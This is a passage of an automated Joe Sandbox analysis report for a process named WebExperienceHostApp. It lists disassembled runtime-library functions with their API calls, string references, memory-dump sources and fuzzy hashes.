Instruction Fuzzy Hash: 5D414CB2F28B569DE7159F2AD8581BC27B1BB08F64F4481F2CA4C57B68DF389564C700

Function 00007FF619492224 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140_APP(?,?,?,?,?,?,?,00007FF619494F8E,?,?,00000000,00007FF619492BE4), ref: 00007FF6194922AF
memcpy.VCRUNTIME140_APP(?,?,?,?,?,?,?,00007FF619494F8E,?,?,00000000,00007FF619492BE4), ref: 00007FF6194922C1
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00007FF619494F8E,?,?,00000000,00007FF619492BE4), ref: 00007FF619492300
memcpy.VCRUNTIME140_APP(?,?,?,?,?,?,?,00007FF619494F8E,?,?,00000000,00007FF619492BE4), ref: 00007FF61949230A
memcpy.VCRUNTIME140_APP(?,?,?,?,?,?,?,00007FF619494F8E,?,?,00000000,00007FF619492BE4), ref: 00007FF61949231C

Strings

.dll, xrefs: 00007FF6194922B7, 00007FF619492312

Memory Dump Source

Source File: 00000008.00000002.2073734215.00007FF619491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF619490000, based on PE: true

Associated: 00000008.00000002.2073718084.00007FF619490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073752558.00007FF61949A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073773372.00007FF61949E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073792932.00007FF61949F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff619490000_WebExperienceHostApp.jbxd

Similarity

API ID: memcpy$_invalid_parameter_noinfo_noreturn
String ID: .dll
API String ID: 2665656946-2738580789
Opcode ID: a66b6c263dc034fa741bc5a32a4f0581ce01679e33cbc66ecdda2b758b859d84
Instruction ID: 5f8970b435dcdb0ef79000d026e99f60149b785f58815c8b70b4da02ce9ccbd0
Opcode Fuzzy Hash: a66b6c263dc034fa741bc5a32a4f0581ce01679e33cbc66ecdda2b758b859d84
Instruction Fuzzy Hash: 5E318062B14E4595EE10AF66E6041A96361FB0DFF8F540232DE6D8BB96DE3CE161C300

Function 00007FFE1A458334 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 81COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FFE1A4581B0: Replicator::operator[].LIBVCRUNTIME ref: 00007FFE1A458271

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A4583E6

Strings

,..., xrefs: 00007FFE1A4583B4
<ellipsis>, xrefs: 00007FFE1A458433
..., xrefs: 00007FFE1A458423
void, xrefs: 00007FFE1A458458
,<ellipsis>, xrefs: 00007FFE1A4583C4

Memory Dump Source

Source File: 00000008.00000002.2073941607.00007FFE1A451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000008.00000002.2073926171.00007FFE1A450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074005137.00007FFE1A461000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074022650.00007FFE1A466000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074040802.00007FFE1A467000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe1a450000_WebExperienceHostApp.jbxd

Similarity

API ID: Name::operator+Replicator::operator[]
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 1405650943-2211150622
Opcode ID: f28504a20d34ee970dce6c75821cee4d56fce513430e27d12ea41e2fafb3b26a
Instruction ID: b1e61535db53df17e2486316b43302d0b74357d62684a32f641760e7a518de46
Opcode Fuzzy Hash: f28504a20d34ee970dce6c75821cee4d56fce513430e27d12ea41e2fafb3b26a
Instruction Fuzzy Hash: 3C4139A2F08F8698F7129B2AD8402B877B4AB08B18F5445F2CA5C13765EF7C95659340

Function 00007FFE007ABFA0 Relevance: 9.3, APIs: 6, Instructions: 339stringCOMMON

Download Yara Rule

APIs

strcspn.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE007AC039
localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFE007AC04C
strcspn.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE007AC061
memset.VCRUNTIME140_APP ref: 00007FFE007AC0ED
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE007AC3DF
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE007AC42A

Part of subcall function 00007FFE007B1DB0: memcpy.VCRUNTIME140_APP(?,?,?,?,00000000,00007FFE007AC21C), ref: 00007FFE007B1E0B
Part of subcall function 00007FFE007B1DB0: memset.VCRUNTIME140_APP(?,?,?,?,00000000,00007FFE007AC21C), ref: 00007FFE007B1E18

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnmemsetstrcspn$localeconvmemcpy
String ID:
API String ID: 1584136638-0
Opcode ID: 8dafaba8b704e5f69c0de98c99f15135745e3cc4b1ac50646b6a12bab98680f1
Instruction ID: 7d48a5c6fccf1c34eee880db588aabcd0f83278779f19117f3809f805884a697
Opcode Fuzzy Hash: 8dafaba8b704e5f69c0de98c99f15135745e3cc4b1ac50646b6a12bab98680f1
Instruction Fuzzy Hash: ADE19122B0AA8599FB02EBB5D4442BC6771BB89B88F584131EF5D577A9DF3CD44AC300

Function 00007FFE007D9170 Relevance: 9.2, APIs: 6, Instructions: 241COMMONLIBRARYCODE

Download Yara Rule

APIs

_Dunscale.LIBCPMT ref: 00007FFE007D91AB
_Dunscale.LIBCPMT ref: 00007FFE007D9263

Part of subcall function 00007FFE007D0A70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE007CFAC4), ref: 00007FFE007D0A79

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: Dunscale$_errno
String ID:
API String ID: 2900277114-0
Opcode ID: 4a9116921bccdd9ba7c2602bfe8ee50023c841c5ca163e05a24b87156944a414
Instruction ID: 74961b8c43130a2b4a9fb2bae81f937831dcdc80a35f6214bc1531256cf2929d
Opcode Fuzzy Hash: 4a9116921bccdd9ba7c2602bfe8ee50023c841c5ca163e05a24b87156944a414
Instruction Fuzzy Hash: DDA1D623E19E4699D711EF7484501BE2372FF16394F585236EB8E266ADDF3CB0968340

Function 00007FFE007D0BAC Relevance: 9.2, APIs: 6, Instructions: 241COMMONLIBRARYCODE

Download Yara Rule

APIs

_FDunscale.LIBCPMT ref: 00007FFE007D0BE7
_FDunscale.LIBCPMT ref: 00007FFE007D0C9E

Part of subcall function 00007FFE007D0A70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE007CFAC4), ref: 00007FFE007D0A79

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: Dunscale$_errno
String ID:
API String ID: 2900277114-0
Opcode ID: 26d5f5b2e3ea1aa057a5f7cbe3a3d7afd4593294d0901e6a324c55da06569687
Instruction ID: 27ac71a47985c5036351aa392b21e4288bc9ae75f4426159b6cc82eca3a1ee8e
Opcode Fuzzy Hash: 26d5f5b2e3ea1aa057a5f7cbe3a3d7afd4593294d0901e6a324c55da06569687
Instruction Fuzzy Hash: 9CA1F632E1A2469AE710FE26C5802BC3732FF55354F5C6637EB89126A9DF3CB0958780

Function 00007FFE007A8ED0 Relevance: 9.2, APIs: 6, Instructions: 179COMMON

Download Yara Rule

APIs

fgetc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFE007A8F81

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: fgetc
String ID:
API String ID: 2807381905-0
Opcode ID: c47d75ecaef4418c9a9eda3c759bfce1d66e83964e9075376022e2f6ad13729b
Instruction ID: a4b3b3b6ac1cb4e119ed205392ce247ce0d60dc0a93e10c8ae5762f120ce1a68
Opcode Fuzzy Hash: c47d75ecaef4418c9a9eda3c759bfce1d66e83964e9075376022e2f6ad13729b
Instruction Fuzzy Hash: FA817E72606A86D9EB249F25C0843AC33A1FB89B88F595236EB1D477A8DF3DD564C300

Function 00007FFE007DBC10 Relevance: 9.2, APIs: 6, Instructions: 167COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE007DC618: iswspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE007DBC62), ref: 00007FFE007DC63E
Part of subcall function 00007FFE007DC618: iswxdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE007DBC62), ref: 00007FFE007DC6B6

_Xp_setn.LIBCPMT ref: 00007FFE007DBCD6
_Xp_setn.LIBCPMT ref: 00007FFE007DBD11
_Xp_addx.LIBCPMT ref: 00007FFE007DBD24
_Xp_setn.LIBCPMT ref: 00007FFE007DBDA2
_Xp_setn.LIBCPMT ref: 00007FFE007DBDDD
_Xp_addx.LIBCPMT ref: 00007FFE007DBDF1

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: Xp_setn$Xp_addx$iswspaceiswxdigit
String ID:
API String ID: 3490103321-0
Opcode ID: 39543d00ebafefd8952b4e756ae2cd2037a97f14381c482cd10f3362f5f158b2
Instruction ID: 65ada736fe569add5ce71459b40854dd9b8f4d4cc002787fa19436fb01e3f44f
Opcode Fuzzy Hash: 39543d00ebafefd8952b4e756ae2cd2037a97f14381c482cd10f3362f5f158b2
Instruction Fuzzy Hash: 8661D122B1A64292E651EE61E4806FE6731FB85744F580137EB8E137ADDF3CE54A8B00

Function 00007FFE007DC3A0 Relevance: 9.2, APIs: 6, Instructions: 167COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE007DC618: iswspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE007DBC62), ref: 00007FFE007DC63E
Part of subcall function 00007FFE007DC618: iswxdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE007DBC62), ref: 00007FFE007DC6B6

_Xp_setn.LIBCPMT ref: 00007FFE007DC466
_Xp_setn.LIBCPMT ref: 00007FFE007DC4A1
_Xp_addx.LIBCPMT ref: 00007FFE007DC4B4
_Xp_setn.LIBCPMT ref: 00007FFE007DC532
_Xp_setn.LIBCPMT ref: 00007FFE007DC56D
_Xp_addx.LIBCPMT ref: 00007FFE007DC581

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: Xp_setn$Xp_addx$iswspaceiswxdigit
String ID:
API String ID: 3490103321-0
Opcode ID: ab2c1903a197715ea7e3e3c2686b46453cfce31a95e7e05e4ed8f6f14867bc67
Instruction ID: e1085147182b42521fe2753d1717ecc9b9be1f4909c60dc0231496cb31b1d6df
Opcode Fuzzy Hash: ab2c1903a197715ea7e3e3c2686b46453cfce31a95e7e05e4ed8f6f14867bc67
Instruction Fuzzy Hash: 8061C022B1A64292E652EE61E4406BE6730FB94744F584133EB8E577ADDE3CE54ACB00

Function 00007FFE007A9990 Relevance: 9.1, APIs: 6, Instructions: 114COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140_APP ref: 00007FFE007A9A81
memcpy.VCRUNTIME140_APP ref: 00007FFE007A9A91
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE007A9AD0
memcpy.VCRUNTIME140_APP ref: 00007FFE007A9ADA
memcpy.VCRUNTIME140_APP ref: 00007FFE007A9AEA
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFE007A9B19

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1775671525-0
Opcode ID: f0a2371f67f01567ff011bb773714b527b9dc57e519c18b817672b899ec6101e
Instruction ID: c2c44baaa2dc56069b7c457625925df0d7df3398df1d6b71c82f7199a0d28181
Opcode Fuzzy Hash: f0a2371f67f01567ff011bb773714b527b9dc57e519c18b817672b899ec6101e
Instruction Fuzzy Hash: 3A410462B1664591EE14AB16E8042B9A351FB85FE0F5C4732EF6D07BE9DE7CE051C300

Function 00007FFE1A456310 Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON

Download Yara Rule

APIs

__unDName.LIBVCRUNTIME ref: 00007FFE1A456366
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE1A4563A9
strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE1A4563D3
InterlockedPushEntrySList.API-MS-WIN-CORE-INTERLOCKED-L1-1-0 ref: 00007FFE1A4563F0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE1A4563FC
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE1A456405

Memory Dump Source

Source File: 00000008.00000002.2073941607.00007FFE1A451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000008.00000002.2073926171.00007FFE1A450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074005137.00007FFE1A461000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074022650.00007FFE1A466000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074040802.00007FFE1A467000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe1a450000_WebExperienceHostApp.jbxd

Similarity

API ID: free$EntryInterlockedListNamePush__unmallocstrcpy_s
String ID:
API String ID: 3741236498-0
Opcode ID: c517e515e802a775e35de6fec8931573401190a97ffe2b49cc87937b1faed4ca
Instruction ID: 626b3ca6512a4bcbb81ee03865d7a043674c1ee5ed377dc21ac0e1e35974e9fe
Opcode Fuzzy Hash: c517e515e802a775e35de6fec8931573401190a97ffe2b49cc87937b1faed4ca
Instruction Fuzzy Hash: 1431B262B19F9581EB11AB17A804579A3A4FF48FF0B5945B6DE2D037A0EE3DD862C340

Function 00007FFE007A2F00 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,00000000,00007FFE007A5F46), ref: 00007FFE007A2F09
calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE007A5F46), ref: 00007FFE007A2F1B
__pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,00000000,00007FFE007A5F46), ref: 00007FFE007A2F2A
__pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,00000000,00007FFE007A5F46), ref: 00007FFE007A2F90
___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,00000000,00007FFE007A5F46), ref: 00007FFE007A2F9E
_wcsdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,00007FFE007A5F46), ref: 00007FFE007A2FB1

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: __pctype_func$___lc_codepage_func___lc_locale_name_func_wcsdupcalloc
String ID:
API String ID: 490008815-0
Opcode ID: 7e2d64ff5f2067317982a7033377e252d5ce5b17cfc21e58bbf341ac59cb7a38
Instruction ID: 5b17ce6c3a392baf90286f158a6a81e9f8c0e4695457870c8ad871cf4753e47b
Opcode Fuzzy Hash: 7e2d64ff5f2067317982a7033377e252d5ce5b17cfc21e58bbf341ac59cb7a38
Instruction Fuzzy Hash: 6F213D22D09F8583E7059F38C5052787360FBA9B48F19A224CF9816326DF7DE1D5C340

Function 00007FFE007D2820 Relevance: 9.0, APIs: 4, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007D283D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007D2847
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007D2851
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007D285B

Strings

@Rz, xrefs: 00007FFE007D2861
(}, xrefs: 00007FFE007D282A

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: free
String ID: (}$@Rz
API String ID: 1294909896-3757791130
Opcode ID: 28282babf5ab9a79a3e9250d435ee7dac1d2215b7bc58fb2e129965c8d656ec7
Instruction ID: f2dd14cb6837929a56c756284f9d5945c2ed2829d125e664f359411210549f08
Opcode Fuzzy Hash: 28282babf5ab9a79a3e9250d435ee7dac1d2215b7bc58fb2e129965c8d656ec7
Instruction Fuzzy Hash: D3F0EC21A1AF0692DB44AB19E9941786370FF88FD4B584031DB4D53B79DF6CE4A58300

Function 00007FFE1A4538CC Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 189COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A456770: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A4523AE), ref: 00007FFE1A45677E

EncodePointer.API-MS-WIN-CORE-UTIL-L1-1-0 ref: 00007FFE1A45393C
_CallSETranslator.LIBVCRUNTIME ref: 00007FFE1A453987
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A453BB5

Strings

RCC, xrefs: 00007FFE1A453958
MOC, xrefs: 00007FFE1A453950

Memory Dump Source

Source File: 00000008.00000002.2073941607.00007FFE1A451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000008.00000002.2073926171.00007FFE1A450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074005137.00007FFE1A461000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074022650.00007FFE1A466000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074040802.00007FFE1A467000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe1a450000_WebExperienceHostApp.jbxd

Similarity

API ID: abort$CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 2889003569-2084237596
Opcode ID: 8b97f7e3628963cc3eaf161c7556eeb719c29ae86539a23f4aa773f98f5ce27b
Instruction ID: c31211862cd80ed68fdcf30bf19c6bdf58f47c435167ecc93f0d6c3a200a1809
Opcode Fuzzy Hash: 8b97f7e3628963cc3eaf161c7556eeb719c29ae86539a23f4aa773f98f5ce27b
Instruction Fuzzy Hash: 9C9192B3B08B818AE711DB66E4902BD77B0F744B98F1441AAEB8D17765DF38E1A5C700

Function 00007FFE1A45B880 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 167COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A45BB20

Strings

std::nullptr_t , xrefs: 00007FFE1A45BAB0
volatile , xrefs: 00007FFE1A45B8E7, 00007FFE1A45BA18
volatile, xrefs: 00007FFE1A45B8F6, 00007FFE1A45BA27
std::nullptr_t, xrefs: 00007FFE1A45BAD9

Memory Dump Source

Source File: 00000008.00000002.2073941607.00007FFE1A451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000008.00000002.2073926171.00007FFE1A450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074005137.00007FFE1A461000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074022650.00007FFE1A466000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074040802.00007FFE1A467000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe1a450000_WebExperienceHostApp.jbxd

Similarity

API ID: Name::operator+
String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
API String ID: 2943138195-757766384
Opcode ID: 7c6913d2299fbb63ca99d8148b6e837cf7c47692d9984bc2afced068521c9eb9
Instruction ID: 56dd8d93d21715796690f72dc721064e54b2977f72172c8fa67e288d9550343f
Opcode Fuzzy Hash: 7c6913d2299fbb63ca99d8148b6e837cf7c47692d9984bc2afced068521c9eb9
Instruction Fuzzy Hash: 93715BB1B08F4294E714AF26D8501BCA6A5BB04BA4F8445F7CA4D07AB8EF7CE575C700

Function 00007FFE1A4536B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A456770: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A4523AE), ref: 00007FFE1A45677E

EncodePointer.API-MS-WIN-CORE-UTIL-L1-1-0 ref: 00007FFE1A4536FC
_CallSETranslator.LIBVCRUNTIME ref: 00007FFE1A45374B
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A4538C3

Strings

RCC, xrefs: 00007FFE1A453719
MOC, xrefs: 00007FFE1A453710

Memory Dump Source

Source File: 00000008.00000002.2073941607.00007FFE1A451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000008.00000002.2073926171.00007FFE1A450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074005137.00007FFE1A461000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074022650.00007FFE1A466000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074040802.00007FFE1A467000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe1a450000_WebExperienceHostApp.jbxd

Similarity

API ID: abort$CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 2889003569-2084237596
Opcode ID: 521ae79be483757eb474348e7632ba4031803828054df45ba905b23fe122da5c
Instruction ID: 9d2fcd0b6e3a27d976ae49a60c7dd57c6cc78d0afae4d31ceb25aa5fd31a6f29
Opcode Fuzzy Hash: 521ae79be483757eb474348e7632ba4031803828054df45ba905b23fe122da5c
Instruction Fuzzy Hash: CD613CB6A08B458AE714DF66D4403BD77A0FB44BA8F0442A6EE5D17BA8CF78E165C700

Function 00007FFE007DC618 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

iswspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE007DBC62), ref: 00007FFE007DC63E
iswspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE007DBC62), ref: 00007FFE007DC64F
iswxdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE007DBC62), ref: 00007FFE007DC6B6

Strings

(, xrefs: 00007FFE007DC787

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: iswspace$iswxdigit
String ID: (
API String ID: 3812816871-3887548279
Opcode ID: af74e7a852e4c75f6a718f3a8d1f3b3ec46cce7310ff1cc0720302810e8eb93a
Instruction ID: 9b797f231bfa0a5e8c2c620545b1b4c2a37202d7e952f075b692f2423231c546
